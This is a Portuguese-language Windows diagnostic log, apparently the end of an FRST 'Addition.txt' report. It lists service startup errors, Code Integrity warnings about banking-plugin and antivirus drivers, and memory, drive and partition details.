Identificação do Relatório: 99688666-692a-11e8-9f22-50b7c3c6601c


Erros de Sistema:
=============
Error: (06/06/2018 07:48:39 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço dahkService foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (06/06/2018 07:47:44 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Falha ao carregar o(s) seguinte(s) driver(s) de início do sistema ou de inicialização:
wsddfac

Error: (06/06/2018 07:47:44 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço saiyi technology limit foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (06/06/2018 07:47:44 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço ResTCPSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (06/06/2018 07:47:44 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Serviço Prefs Secure suspenso ao iniciar.

Error: (06/06/2018 07:47:43 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Serviço Background Logic Handler suspenso ao iniciar.

Error: (06/06/2018 07:43:48 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço DgiVecp devido ao seguinte erro:
O sistema não pode encontrar o arquivo especificado.

Error: (06/05/2018 10:57:13 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: O serviço Serviço da Lista de Redes depende do serviço Reconhecimento de Locais de Rede, mas não foi possível iniciá-lo devido ao seguinte erro:
Não foi possível iniciar o serviço ou grupo de dependência.


CodeIntegrity:
===================================

Date: 2018-05-25 19:47:47.963
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Diebold\Warsaw\wslbscrwh64.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-05-25 19:47:47.948
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Diebold\Warsaw\wslbscr64.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:12:02.812
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\PROGRA~2\GbPlugin\wsftprp64.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:12:02.781
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\GbPlugin\gbprcm64.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:12:02.672
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:11:31.688
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsddpp.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:11:27.164
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswKbd.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:11:26.368
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswSnx.sys because the set of per-page image hashes could not be found on the system.

==================== Informações da Memória ===========================

Processador: Intel(R) Core(TM) i3-3120M CPU @ 2.50GHz
Percentagem de memória em uso: 76%
RAM física total: 3797.3 MB
RAM física disponível: 889.89 MB
Virtual Total: 7592.8 MB
Virtual disponível: 4235.98 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:357.28 GB) NTFS

\\?\Volume{fad0dff0-a57d-11e5-aaf2-806e6f6e6963}\ (Reservado pelo Sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 88E80C01)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================